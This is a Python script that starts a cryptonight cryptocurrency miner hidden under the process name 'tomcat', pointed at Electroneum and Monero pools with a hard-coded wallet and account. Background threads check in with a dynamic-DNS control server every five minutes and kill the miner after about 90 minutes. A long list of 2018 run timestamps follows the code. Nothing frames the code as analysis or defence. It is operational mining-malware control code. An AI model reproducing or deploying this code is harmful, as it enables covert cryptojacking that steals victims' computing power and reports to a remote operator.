import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:08:06.394210
#2018-02-17 15:54:06.873647
#2018-02-17 17:41:04.393547
#2018-02-17 19:28:02.041251
#2018-02-17 21:18:01.432527
#2018-02-17 23:02:01.780349
#2018-02-18 00:49:04.268847
#2018-02-18 02:36:07.575738
#2018-02-18 04:23:06.323843
#2018-02-18 06:13:06.726939
#2018-02-18 08:04:06.488762
#2018-02-18 09:52:07.577457
#2018-02-18 11:39:05.097875
#2018-02-18 13:24:07.933937
#2018-02-18 15:14:01.384035
#2018-02-18 17:03:06.522524
#2018-02-18 18:50:03.931587
#2018-02-18 20:37:01.341105
#2018-02-18 22:23:01.629163
#2018-02-19 00:13:04.268503
#2018-02-19 01:58:06.037354
#2018-02-19 03:45:08.697288
#2018-02-19 05:31:01.339635
#2018-02-19 07:18:05.788023
#2018-02-19 09:07:01.636380
#2018-02-19 10:56:05.418572
#2018-02-19 12:45:05.208877
#2018-02-19 14:32:01.801111
#2018-02-19 16:20:05.058916
#2018-02-19 18:06:09.711604
#2018-02-19 19:54:04.752886
#2018-02-19 21:41:03.568614
#2018-02-19 23:27:02.091971
#2018-02-20 01:13:03.552935
#2018-02-20 03:02:05.887011
#2018-02-20 04:48:03.542690
#2018-02-20 06:32:03.858736
#2018-02-20 08:16:07.562489
#2018-02-20 10:01:01.464804
#2018-02-20 11:45:09.668515
#2018-02-20 13:34:03.744212
#2018-02-20 15:17:04.215412
#2018-02-20 17:02:08.853063
#2018-02-20 18:52:07.058827
#2018-02-20 20:44:01.773227
#2018-02-20 22:28:06.080316
#2018-02-21 00:10:07.345038
#2018-02-21 01:56:07.276916
#2018-02-21 03:46:03.685286
#2018-02-21 05:34:06.617457
#2018-02-21 07:23:17.352475
#2018-02-21 09:08:03.590179
#2018-02-21 10:56:06.349762
#2018-02-21 12:43:01.360165
#2018-02-21 14:30:01.785290
#2018-02-21 16:16:09.205474
#2018-02-21 18:07:07.486516
#2018-02-21 19:55:07.562255
#2018-02-21 21:41:01.396348
#2018-02-21 23:28:05.591444
#2018-02-22 01:17:06.968399
#2018-02-22 03:07:07.474123
#2018-02-22 04:53:01.607651
#2018-02-22 06:38:05.644384
#2018-02-22 08:26:07.587532
#2018-02-22 10:13:08.330990
#2018-02-22 11:58:04.302570
#2018-02-22 13:45:10.643009
#2018-02-22 15:32:08.584505
#2018-02-22 17:18:06.514287
#2018-02-22 19:05:01.614278
#2018-02-22 20:57:02.139279
#2018-02-22 22:42:05.926401
#2018-02-23 00:29:05.397968
#2018-02-23 02:16:06.842941
#2018-02-23 04:04:01.552544
#2018-02-23 05:51:01.703390
#2018-02-23 07:41:06.432488
#2018-02-23 09:46:02.137719
#2018-02-23 11:51:04.157071
#2018-02-23 13:41:05.531679
#2018-02-23 15:29:02.020261
#2018-02-23 17:19:08.399708
#2018-02-23 19:05:10.409471
#2018-02-23 20:51:05.974194
#2018-02-23 22:41:06.280604
#2018-02-24 00:27:04.838264
#2018-02-24 02:18:07.819003
#2018-02-24 04:08:01.691895
#2018-02-24 05:56:02.167647
#2018-02-24 07:43:05.957519
#2018-02-24 09:28:01.795912
#2018-02-24 11:22:07.679736
#2018-02-24 13:11:07.484908
#2018-02-24 15:01:07.094245
#2018-02-24 16:51:05.409832
#2018-02-24 18:39:06.996843
#2018-02-24 20:30:07.798491
#2018-02-24 22:27:06.907851
#2018-02-25 02:52:07.269731
#2018-02-25 06:34:07.445678